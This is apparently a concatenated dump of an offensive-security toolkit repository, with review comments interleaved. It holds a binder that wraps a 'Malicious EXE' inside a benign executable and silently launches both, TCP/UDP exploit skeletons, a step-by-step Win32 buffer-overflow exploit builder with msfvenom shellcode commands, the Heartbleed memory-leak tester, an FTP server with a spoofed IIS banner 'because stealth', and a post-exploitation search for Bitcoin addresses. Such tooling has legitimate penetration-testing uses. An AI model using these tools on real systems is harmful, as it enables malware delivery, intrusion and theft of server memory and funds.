5 | # wc -m counts the space characters, but the for loop is ignorning the space characters for some reason 6 | read -p "String to convert: " conv_string; 7 | 8 | str_count=$(echo $conv_string | wc -m) 9 | counter=1 10 | outstring="exec = Command + " 11 | 12 | for testchar in $(echo $conv_string | fold -w1); do 13 | #for testchar in $(echo $conv_string); do 14 | #for testchar in $conv_string; do 15 | newchr=$(egrep "(Chr)\(.{1,3}\).[$testchar]" chr_table.txt | awk '{print $1}') 16 | counter=$((counter+1)) 17 | # Handle space characters 18 | #if [[ $testchar == "\ " ]] 19 | #then 20 | #newchr="Chr(32)" 21 | #fi 22 | 23 | outstring+=$newchr 24 | 25 | if [[ $(expr $counter % 50) -eq 0 ]] 26 | then 27 | outstring+="\nexec = exec " 28 | fi 29 | 30 | if [[ $counter -ne $str_count ]] 31 | then 32 | outstring+=" + " 33 | fi 34 | done 35 | 36 | echo -e "\nOutput\n====================================\n" 37 | 38 | echo -e $outstring 39 | -------------------------------------------------------------------------------- /exploit-development/tcp_exploit_skeleton.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # TCP Exploit Skeleton 3 | # Und3rf10w 4 | import socket 5 | from sys import exit,argv 6 | 7 | if len(argv) < 2: 8 | print "UNDEF-TODO: TCP Exploit Skeleton" 9 | print "Usage: %s " % str(argv[0]) 10 | exit(0) 11 | 12 | # Buffer Goes here 13 | buffer"" 14 | 15 | try: 16 | print "Attacking %s:%s" % (str(argv[1]),int(argv[2])) 17 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | connect=s.connect((str(argv[1]),int(argv[2]))) 19 | # This next part depends on whatever the RFC is for what you're trying to 20 | # exploit. Up to you to put the 'string' in the right place. Be sure to 21 | # receive bytes after sending anything. 
22 | s.recv(1024) # Grab the banner, do not remove 23 | s.send(string + "\r\n") # Sends your evil buffer as 'string' 24 | s.send('QUIT\r\n') # Replace 'QUIT' with whatever ends your session 25 | s.close() 26 | except: 27 | print "ERROR: socket() failed" 28 | exit(1) 29 | 30 | -------------------------------------------------------------------------------- /exploit-development/udp_exploit_skeleton.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # UDP Exploit Skeleton 3 | # Und3rf10w 4 | import socket 5 | from sys import exit,argv 6 | 7 | if len(argv) < 2: 8 | print "UNDEF-TODO: UDP Exploit Skeleton" 9 | print "Usage: %s " % str(argv[0]) 10 | exit(0) 11 | 12 | # evil buffer here 13 | buf = "" 14 | 15 | try: 16 | print "Attacking %s:%s" % (str(argv[1]),int(argv[2])) 17 | s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 18 | # This next part depends on whatever the RFC is for what you're trying to 19 | # exploit. Up to you to put the 'string' in the right place. 20 | string = "" 21 | s.sendto(string, (str(argv[1]), int(argv[2]))) # Sends your evil buffer as 'string' to host:port 22 | except: 23 | print "ERROR: socket() failed" 24 | exit(1) 25 | 26 | -------------------------------------------------------------------------------- /exploit-development/win32/binders/poor_mans_binder.py: -------------------------------------------------------------------------------- 1 | # This runs on windows only at this time 2 | # Would eventually like to make it cross platform (pyinstaller instead of py2exe) 3 | # A lot of this code was "inspired" by veil-evasion 4 | # Und3rf10w 5 | 6 | import base64, random, string, sys, os, argparse, re 7 | 8 | desc = "Relatively simple binder intended to be incredibly lightweight. Assumes payload is already a compiled exe that will execute as a separate process. Provided the benefit of leaving the original executeable 'intact', allowing it to pass any signature checks made at RUNTIME. 
Emphasis on RUNTIME."
# NOTE(review): the top of this file (shebang, imports, the `desc` string) sits above this
# chunk; argparse, sys, random, string and base64 are assumed to be imported there.
parser = argparse.ArgumentParser(prog='simple_binder', usage=sys.argv[0] + ' [options]', description=desc)
parser.add_argument('-t', "--template", type=str, help="Base file to use")
parser.add_argument('-m', "--virus", type=str, help="Malicious EXE to use")
args = parser.parse_args()


# Both inputs are mandatory; argparse's required= is not used, so the check is manual.
if not args.template or not args.virus:
    parser.print_help()
    exit()

template_file = args.template
virus_file = args.virus

# Totally stolen straight from veil-evasion
def randomString(length=-1):
    """
    Returns random string of "length" characters.
    If no length is specified, resulting string is between 6 and 15 characters.

    Only ASCII letters are used, so the result is always a valid Python identifier
    (the generated script below uses these as variable names).
    """
    if length == -1: length = random.randrange(6,16)
    random_string = ''.join(random.choice(string.ascii_letters) for x in range(length))
    return random_string

# Get and encode the template file
# Both inputs are read fully into memory and base64-encoded; the encoded text is
# embedded verbatim into the generated script, so its size grows with the inputs.
with open(template_file, "rb") as templateOpen:
    encodedTemplate = base64.b64encode(templateOpen.read())

# Get and encode the malicious file
with open(virus_file, "rb") as virusOpen:
    encodedVirus = base64.b64encode(virusOpen.read())

def outputPrep():
    """
    Write exploit.py, the generated script.

    Defensive summary of what that script does when run (taken from the write()
    calls below): it decodes both base64 blobs into files under the user's %TEMP%
    directory and launches each one with os.startfile(). The template keeps its
    original file name; the second file gets a random name with an .exe suffix.
    The randomised identifiers only rename local variables in the generated source
    and do not change that write-to-TEMP-then-launch sequence, which is the
    observable behaviour a defender can look for.
    """
    with open('exploit.py', "w+") as outputprePrep:
        outputprePrep.write("import base64,os,sys\n")
        # randomize variable names
        base_exe_location = randomString()
        base_temp = randomString()
        base_encoded = randomString()
        virus_exe_location = randomString()
        virus_exe_name = randomString()
        virus_encoded = randomString()
        virus_temp = randomString()
        # write exploit.py
        outputprePrep.write("%s = \"%s\"\n" %(base_encoded,encodedTemplate))
        # NOTE(review): template_file is used as given on the command line; a path
        # with directory components would end up inside the generated TEMP path.
        outputprePrep.write("%s = os.getenv('TEMP') + \"\\\%s\"\n" % (base_exe_location,template_file))
        outputprePrep.write("with open(%s, 'wb+') as %s:\n" %(base_exe_location, base_temp))
        outputprePrep.write("\t%s.write(base64.b64decode(%s))\n" %(base_temp,base_encoded))
        outputprePrep.write("\t%s.close()\n\n" %(base_temp))
        outputprePrep.write("os.startfile(%s)\n" %(base_exe_location))
        outputprePrep.write("%s = os.getenv('TEMP') + \"\\\%s.exe\"\n" %(virus_exe_location,virus_exe_name))
        outputprePrep.write("%s = \"%s\"\n" %(virus_encoded,encodedVirus))
        outputprePrep.write("with open(%s, 'wb+') as %s:\n" %(virus_exe_location,virus_temp))
        outputprePrep.write("\t%s.write(base64.b64decode(%s))\n" %(virus_temp,virus_encoded))
        outputprePrep.write("\t%s.close()\n\n" %(virus_temp))
        outputprePrep.write("os.startfile(%s)\n" %(virus_exe_location))
        outputprePrep.write("sys.exit(0)")
        # Redundant: the with block closes the file on exit.
        outputprePrep.close()

outputPrep()
# These two close() calls act on file objects the with blocks above already closed;
# harmless but redundant.
templateOpen.close()
virusOpen.close()

# Building the construction script
def runmebatPrep():
    """
    Write runme.bat, the Windows-side build step: runs py2exe via setup.py, moves
    dist\exploit.exe up one directory and deletes the build/ and dist/ folders.
    """
    with open('runme.bat', "w+") as runmebatprePrep:
        runmebatprePrep.write("rem Batch Script for compiling python code into an executable\n")
        runmebatprePrep.write("rem on windows with py2exe\n")
        runmebatprePrep.write("rem Usage: Drop into your Python folder and click, or anywhere if Python is in your system path\n\n")
        runmebatprePrep.write("python setup.py py2exe\n")
        runmebatprePrep.write("cd dist\n")
        runmebatprePrep.write("move exploit.exe ../\n")
        runmebatprePrep.write("cd ..\n")
        runmebatprePrep.write("rmdir /S /Q build\n")
        runmebatprePrep.write("rmdir /S /Q dist\n")
        # Redundant: the with block closes the file on exit.
        runmebatprePrep.close()

runmebatPrep()

# Supporting file for py2exe
def setupfilePrep():
    """
    Write the py2exe setup.py. bundle_files=1 together with zipfile=None yields a
    single self-contained executable, and the 'windows=' target builds a
    GUI-subsystem binary (no console window is shown when it runs).
    """
    with open('setup.py', "w+") as setupfileprePrep:
        setupfileprePrep.write("from distutils.core import setup\n")
        setupfileprePrep.write("import py2exe, sys, os\n\n")
        setupfileprePrep.write("setup(\n")
        setupfileprePrep.write("\toptions = {'py2exe': {'bundle_files': 1}},\n")
        setupfileprePrep.write("\tzipfile = None,\n")
        setupfileprePrep.write("\twindows=['exploit.py']\n")
        setupfileprePrep.write(")\n")
        # Redundant: the with block closes the file on exit.
        setupfileprePrep.close()

setupfilePrep()

# TODO:
# * Automatically execute runme.bat
# * Package all files in a folder for easy dist

# NOTE(review): bare exit() is the site-module helper, not sys.exit().
exit()
-------------------------------------------------------------------------------- /exploit-development/win32/buffer-overflows/win32-buffer-overflow-development-and-exploitation-skeleton.py: --------------------------------------------------------------------------------
#!/usr/bin/python
# @Und3rf10w - 20150618
# NOTE(review): Python 2 script (print statements, raw_input). It is entirely
# operator-driven: every step pauses for values read off a debugger by hand.
import socket
from sys import exit,argv
from subprocess import Popen, PIPE, STDOUT

# Defining the connection
def sendbuffer(host,port,buffer):
    """
    Connect to host:port over TCP, read the banner, send `buffer`, read the reply.

    Review notes: the bare except also catches KeyboardInterrupt and any error
    raised by recv/send after the connection succeeded, reporting all of them as
    "Could not connect"; the socket is never closed explicitly.
    """
    try:
        print "\nSending unique evil buffer to %s:%s" % (host,port)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host,port))
        # This next part depends on whatever the RFC is for what you're trying to
        # exploit. Up to you to put the 'string' in the right place. Be sure to
        # receive bytes after sending anything.
        print repr(s.recv(1024)) # Grabs the banner. Do not remove
        s.send(buffer) # Sends the unique string into the buffer
        print repr(s.recv(1024))
        print "\nBuffer sent..."
        print "Please restart the service and reattach your disassembler now!"
    except:
        print "Could not connect to the service"
        exit(2)

def eip_control_check_prompt(s):
    """Map a yes/no answer to a status string.

    NOTE(review): the exit(3) after the return is unreachable, so a "no" answer
    only returns the error text and the caller carries on.
    """
    if s == "Yes" or s == "yes" or s == "YES" or s == "y" or s == "Y":
        return "Excellent. Continuing to shellcode insertion"
    elif s == "No" or s == "no" or s == "NO" or s == "n" or s == "N":
        return "ERROR: Something went wrong. You don't have control over EIP"
        exit(3)
    else:
        return "\nPlease type 'yes' or 'no'"

def increase_buffer_size_prompt(s, *args, **kwargs):
    """Map a yes/no answer to a new buffer size.

    NOTE(review): both branches return their message string first, so the
    new_space computations below them are unreachable and the caller always
    receives a str. shellcode_space is read from kwargs only, but the call site
    at the bottom of this file passes it positionally, so it is None here.
    """
    shellcode_space = kwargs.get('shellcode_space', None)
    if s == "Yes" or s == "yes" or s == "YES" or s == "y" or s == "Y":
        return "Increasing size of buffer"
        new_space = (350 - shellcode_space) + shellcode_space
        return new_space
    elif s == "No" or s == "no" or s == "NO" or s == "n" or s == "N":
        return "Continuing with current shellcode space"
        new_space = shellcode_space
        return new_space
    else:
        return "\nPlease type 'yes' or 'no'"

def bad_character_prompt(s, *args, **kwargs):
    """Return True for yes, False for no, and a re-prompt string otherwise.

    Note the mixed return type: the caller compares against False with != and ==,
    so the re-prompt string counts as "not False" there.
    """
    if s == "Yes" or s == "yes" or s == "YES" or s == "y" or s == "Y":
        return True
    elif s == "No" or s == "no" or s == "NO" or s == "n" or s == "N":
        return False
    else:
        return "\nPlease type 'yes' or 'no'"


def return_address_test(return_address, *args, **kwargs):
    """Send a buffer built around `return_address` and wait for the operator.

    Reads the module-level eip_offset, available_space, host, port and argv[3],
    all of which are assigned further down at import time. Returns the address
    unchanged.
    """
    pivot_address = return_address
    buffer = "\x41"*(eip_offset-1) + pivot_address + "\x90"*12 + "\x43"*(available_space - (int(argv[3])- eip_offset) - 12)
    sendbuffer(host, port, buffer)
    raw_input("Press enter to continue once you have reattached the debugger...")
    return_address = pivot_address
    return return_address

def return_address_prompt(s, *args, **kwargs):
    """Return True for yes, False for no, and a re-prompt string otherwise."""
    if s == "Yes" or s == "yes" or s == "YES" or s == "y" or s == "Y":
        return True
    elif s == "No" or s == "no" or s == "NO" or s == "n" or s == "N":
        return False
    else:
        return "\nPlease type 'yes' or 'no'"

def generate_report(host, port, eip_offset, available_space, bad_characters,return_address):
    """Print a plain-text summary of the values collected during the session.

    port is formatted with %d, so it must be an int; the other fields are
    formatted with %s and are passed in as strings by the caller.
    """
    print "Generating report.. \n"
    print """
Service
=======
%s:%d

EIP Offset Location
===================
%s

Bytes Available For Shellcode
=============================
%s

Bad Characters
==============
%s

Return Address
==============
%s""" %(host, port, eip_offset, available_space, bad_characters,return_address)

    print "Modify the following command to generate your shellcode:\n"
    print "msfvenom -p -f c -b '%s' -x 86 --platform windows -e x86/shikata_ga_nai " % bad_characters

# test if script was executed correctly
# NOTE(review): argv[3] is read below, so this guard admits a 3-element argv that
# will fail on the first argv[3] access.
if len(argv) < 3:
    print "Assists with buffer overflow exploit development for Win32 binaries"
    print "Usage: %s " % str(argv[0])
    exit(1)

# Create a unique buffer from given buffer length
# Both Popen calls use shell=True; the length is an int here, but `eip` below is
# raw operator input interpolated into a shell command line.
cmd = '/usr/share/metasploit-framework/tools/pattern_create.rb %d' % int(argv[3])
p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
buffer = str(p.stdout.read())
host = str(argv[1])
port = int(argv[2])
# Send inital buffer
sendbuffer(host,port,buffer)

# Receive value of EIP register from user
eip = raw_input('\nInsert the value of EIP at the time of the crash: ') # receive the value of EIP from user

# Determine EIP offset
cmd = '/usr/share/metasploit-framework/tools/pattern_offset.rb %s' % eip
p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
print p.stdout.read()

# store value of EIP offset
# NOTE(review): `offset` is not assigned anywhere visible in this file (the
# pattern_offset output is printed on the line above, not stored), and `list`
# shadows the builtin.
list = offset.split()
eip_offset = int(list[5])

# Make new confirmation buffer
buffer = "A"*eip_offset + "B"*4 + "C"*(int(argv[3]) - eip_offset)

# Send new buffer
sendbuffer(host,port,buffer)

# Ask user if they have control over EIP
prompt = raw_input("Was the value of EIP 42424242 at crash time?: ")
print(eip_control_check_prompt(prompt))
available_space = int(argv[3]) - int(eip_offset)
print "You currently have %d bytes available for shellcode execution" % int(available_space)

#initalize new_space
new_space = 0
# Check if enough space available for shellcode, returns new_space
# NOTE(review): increase_buffer_size_prompt returns a str (see its docstring),
# which is then passed to int() and added to available_space below.
while int(available_space) < 349:
    print "\nWARN: You don't have enough space for most shellcode"
    prompt = raw_input("Do you want to try a bigger buffer?: ")
    shellcode_space = available_space
    new_space = increase_buffer_size_prompt(prompt,shellcode_space,new_space)
    buffer = 'A'*eip_offset + 'B'*4 + 'C'*((int(argv[3]) - int(eip_offset)) + int(new_space))
    sendbuffer(host,port,buffer)
    raw_input("Press enter to continue once you have reattached the debugger...")
    available_space = available_space + new_space
    print "You currently have %d bytes available for shellcode execution" % int(available_space)
    if available_space >= 349:
        print "Enough space availabe for shellcode execution"
        break

# Check for presence of bad characters
# Every byte value 0x01..0xff (0x00 is deliberately absent).
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )

buffer = "A"*eip_offset + "B"*4 + badchars

print "Attempting to check for presence of bad characters"
sendbuffer(host,port,buffer)

# initalize bad_characters and rem_char
bad_character_test_result = None
bad_characters = ""
rem_char = None
bad_char_flag = 0
prompt = raw_input("Did you encounter any bad characters?: ")
# NOTE(review): `prompt` is read once above and never re-read inside the loop,
# so once the answer is yes there is no exit path other than an interrupt.
# str.translate returns a new string and its result is discarded below, so
# badchars is never actually reduced before being re-sent.
while bad_character_test_result != False:
    bad_character_test_result = bad_character_prompt(prompt)
    if bad_char_flag == 1:
        rem_char = raw_input("\nWhat was the bad character? (\\x00): ")
        if rem_char != None:
            badchars.translate(None, rem_char)
            bad_characters += rem_char
            print "\nCurrent bad characters: '%s'" %bad_characters
            buffer = "A"*eip_offset + "B"*4 + badchars
            print "\nSending new buffer..."
            sendbuffer(host,port,buffer)
            raw_input("Press enter to continue once you have reattached the debugger...")
    bad_char_flag = 1
    if bad_character_test_result == False:
        break

print "Identified bad characters:\n%s" % str(bad_characters)


### Return address identification ###
print "\nNow we just need to identify a return address to redirect the execution from"

return_address = None
return_address_flag = 0
return_address_test_result = None
prompt = raw_input("Did that return address work?: ")
# NOTE(review): as in the bad-character loop, `prompt` is read before the loop and
# never updated; return_address_test_result is only evaluated from the second
# iteration on (return_address_flag == 1).
while return_address_test_result != True:
    return_address_dirty = raw_input("Set a new breakpoint on and provide the address to try to return from in little endian format ('0043D0A0' -> '\\xa0\\xd0\\x43\\x00'): ")
    return_address_clean = return_address_dirty.replace("\\x","")
    # NOTE(review): "\b" is a backspace character (0x08) prepended to the decoded
    # bytes, presumably not what was intended — confirm.
    return_address = "\b"+return_address_clean.decode("hex")
    return_address = return_address_test(return_address)
    if return_address_flag == 1:
        return_address_test_result = return_address_prompt(prompt)
    return_address_flag = 1
    if return_address_test_result == True:
        break

return_address = return_address

# print "INFO: Using %s for the return address" %return_address_dirty.replace("\\x","")

generate_report(host, port, str(eip_offset), available_space, str(bad_characters), return_address)

print "Your sample exploit code in python is:\n buffer = 'A'*%s + '%s' + shellcode + + 'C'*(%s-%s-%d-%d-len(shellcode)-)" %(str(eip_offset), return_address, str(argv[3]), str(eip_offset), len(str(return_address)), len("AUTH "))

exit(0)
-------------------------------------------------------------------------------- /exploit/web/heartbleed-tester.py: --------------------------------------------------------------------------------
#!/usr/bin/env python2

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# NOTE(review): Python 2 only (str.decode('hex'), print statements, xrange).
# Used as a vulnerability check: it reports whether the server echoes back more
# heartbeat data than it was sent. Anything it prints from the response is
# server memory and should be handled as sensitive output.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')

def h2bin(x):
    """Turn a whitespace-separated hex dump into a raw byte string (Python 2 str)."""
    return x.replace(' ', '').replace('\n', '').decode('hex')

# A fixed TLS 1.1 (03 02) ClientHello record, sent byte-for-byte.
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

# Heartbeat record (content type 0x18) whose 3-byte body declares a much larger
# payload length than the record carries; hit_hb() decides by whether the reply
# is longer than those 3 bytes.
hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    """Print `s` as 16-byte rows of hex plus printable-ASCII, then a blank line."""
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print ' %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    """Read exactly `length` bytes from socket `s`, or return None on timeout/EOF.

    NOTE(review): the select() wait is a fixed 5 seconds rather than the remaining
    `rtime`, so the overall deadline is only enforced between reads.
    """
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata


def recvmsg(s):
    """Read one TLS record: a 5-byte header (type, version, length) then the payload.

    Returns (typ, ver, payload), or (None, None, None) if the peer closed the
    connection before a full record arrived.
    """
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    """Send the heartbeat probe and classify the server's reply.

    Returns True when a heartbeat response (type 24) arrives — and flags the
    server as vulnerable when that response exceeds the 3 bytes that were sent —
    and False on an alert (type 21) or a closed connection. Other record types
    are skipped and the loop keeps reading.
    """
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False

def main():
    """Connect, optionally negotiate STARTTLS, complete the ClientHello/ServerHello
    exchange, then run the heartbeat probe.

    NOTE(review): the local name `re` below shadows the imported re module
    inside main, and hb is sent both here and again inside hit_hb(), so the
    probe goes out twice.
    """
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))

    if opts.starttls:
        re = s.recv(4096)
        if opts.debug: print re
        s.send('ehlo starttlstest\n')
        re = s.recv(1024)
        if opts.debug: print re
        if not 'STARTTLS' in re:
            if opts.debug: print re
            print 'STARTTLS not supported...'
            sys.exit(0)
        s.send('starttls\n')
        re = s.recv(1024)

    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()
-------------------------------------------------------------------------------- /file-transfers/ftp/small_ftp_server.py: --------------------------------------------------------------------------------
#!/usr/bin/env python

# Small and quick FTP daemon used to quickly transfer files via FTP
# requires pyftpdlib
# pip install pyftpdlib

# @Und3rf10w - 20150627
#
# NOTE(review): the password is taken from the command line, so it is visible in
# shell history and process listings; the server speaks plaintext FTP and binds
# to all interfaces by default (-H 0.0.0.0). Intended for short-lived, local use.

# imports
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
from sys import argv
import argparse

# Required command line switches
parser = argparse.ArgumentParser(prog=str(argv[0]), usage='%(prog)s [options]', description='Small and quick FTP server daemon used to quickly transfer files via FTP')
parser.add_argument('-u', help='Username that can connect to the FTP server (full rights)', required=True, dest='user')
parser.add_argument('-p', help='Password for user that can connect to the FTP server', required=True, dest='password')
parser.add_argument('-d', help='Directory to be used for FTP root', required=True, dest='ftproot')

# Optional command line switches
# -P has no type=, so a user-supplied port arrives as a str and is int()-ed below.
parser.add_argument('-P', help='Port to run FTP instance on', default=21, dest='port')
# NOTE(review): default is the string 'store_false', not False. The `anon == True`
# comparison below still treats it as off, but a truthiness check would not.
parser.add_argument('-a', help='Allow anonymous (read-only) logins', action='store_true', default='store_false', dest='anon')
parser.add_argument('-H', help='IP/hostname to bind FTP instance to', default='0.0.0.0', dest='host')

# parse arguments
args = parser.parse_args()
argsdict = vars(args)
user = argsdict['user']
password = argsdict['password']
ftproot = argsdict['ftproot']
port = argsdict['port']
anon = argsdict['anon']
host = argsdict['host']


# Begin authorization
authorizer = DummyAuthorizer()
# "elradfmw" is the full pyftpdlib permission set: change dir, list, retrieve,
# append, delete, rename, mkdir and store — the named user can modify and delete
# anything under ftproot.
authorizer.add_user(user, password, ftproot, perm="elradfmw")
if anon == True:
    # "elm" = change dir, list, mkdir. Note this grants no 'r' (retrieve) but does
    # grant 'm', so "read-only" in the -a help text is not quite accurate.
    authorizer.add_anonymous(ftproot, perm="elm")

# Initalize the FTP Handler
handler = FTPHandler
handler.authorizer = authorizer
# The banner is spoofed to look like IIS; scanners that trust the banner will
# misclassify this host as a Windows FTP service.
handler.banner = "Microsoft FTP Service" # because stealth

# Define the FTP Service
server = FTPServer((host, int(port)), handler)

# Run until ^C
server.serve_forever()
-------------------------------------------------------------------------------- /post-exploit/linux/find_bitcoin_addresses.sh: --------------------------------------------------------------------------------
# Recursively grep the current tree for lines that consist solely of a
# legacy Base58 Bitcoin address (leading 1 or 3, 26-33 characters); the ^ and $
# anchors mean an address embedded in other text on a line is not matched.
# NOTE(review): egrep is deprecated in favour of `grep -E`.
egrep "^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$" . -R 2>/dev/null
--------------------------------------------------------------------------------